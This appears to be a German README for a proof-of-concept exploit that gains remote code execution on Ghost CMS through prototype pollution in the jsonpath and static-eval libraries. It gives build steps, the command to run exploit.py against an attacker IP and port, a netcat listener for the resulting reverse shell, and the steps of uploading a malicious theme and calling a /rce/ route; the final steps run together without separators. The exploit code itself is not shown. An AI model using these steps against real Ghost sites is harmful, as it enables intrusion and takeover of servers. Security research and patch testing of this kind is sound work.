
Proof-of-Concept-Exploit für die Remote-Codeausführung in Ghost CMS über Prototype Pollution in jsonpath und static-eval, mit Einrichtung einer verwundbaren Umgebung und Nutzungsanleitung.
Ghost CMS RCE über jsonpath/static-eval-Prototypenkette.
cd build
./build.sh
python3 exploit.py -i <YOUR_IP> -p <PORT>
nc -lvnp <PORT>malicious-theme.zip in Ghost Admin → Einstellungen → Design hochladenrce erstellen/rce/ aufrufen